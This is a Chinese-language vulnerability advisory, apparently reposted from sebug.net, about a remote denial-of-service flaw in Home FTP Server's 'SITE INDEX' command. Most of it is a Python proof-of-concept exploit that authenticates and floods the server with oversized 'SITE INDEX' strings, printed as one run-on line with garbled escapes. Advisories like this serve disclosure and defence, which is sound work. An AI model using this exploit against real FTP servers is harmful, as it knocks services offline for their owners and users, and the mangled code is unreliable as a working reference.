Home FTP Server 'SITE INDEX'命令远程拒绝服务漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-20
Home FTP Server 影响版本:
Home Ftp Server Home Ftp Server 1.10.1 .139Home Ftp Server Home Ftp Server 1.10 .138Home Ftp Server Home Ftp Server 1.0.7 b45Home Ftp Server Home Ftp Server 1.4.5 Build 84Home Ftp Server Home Ftp Server 1.3.4.93
漏洞描述:
Bugraq ID: 37033Home FTP Server是一款FTP服务程序。Home FTP Server不正确处理"SITE INDEX"命令,远程安全者可以利用漏洞对服务程序进行拒绝服务安全。用户需要验证通过才能触发此漏洞。
<*参考
zhangmc[at]mail.ustc.edu.cn
http://www.securityfocus.com/archive/1/507893
*>测试方法:[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/pythonimport socketimport sysdef Usage():print ("Usage: ./expl.py <serv_ip> <Username> <password>/n")print ("Example:./expl.py 192.168.48.183 anonymous anonymous/n")if len(sys.argv) <> 4:Usage()sys.exit(1)else:hostname=sys.argv[1]username=sys.argv[2]passwd=sys.argv[3]test_string="a"*30sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)for i in range(1,30):try:sock.connect((hostname, 21))except:print ("Connection error!")sys.exit(1)r=sock.recv(1024)print "[+] "+ rsock.send("user %s/r/n" %username)print "[-] "+ ("user %s/r/n" %username)r=sock.recv(1024)print "[+] "+ rsock.send("pass %s/r/n" %passwd)print "[-] "+ ("pass %s/r/n" %passwd)r=sock.recv(1024)print "[+] "+ rfor i in range(1,20):sock.send("SITE INDEX "+ test_string*i +"/r/n")print "[-] "+ ("SITE INDEX "+ test_string +"/r/n")r=sock.recv(1024)print "[+] "+ rsock.close()sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sys.exit(0); 
SEBUG安全建议:
目前没有详细解决方案提供:http://downstairs.dnsalias.net/homeftpserver.html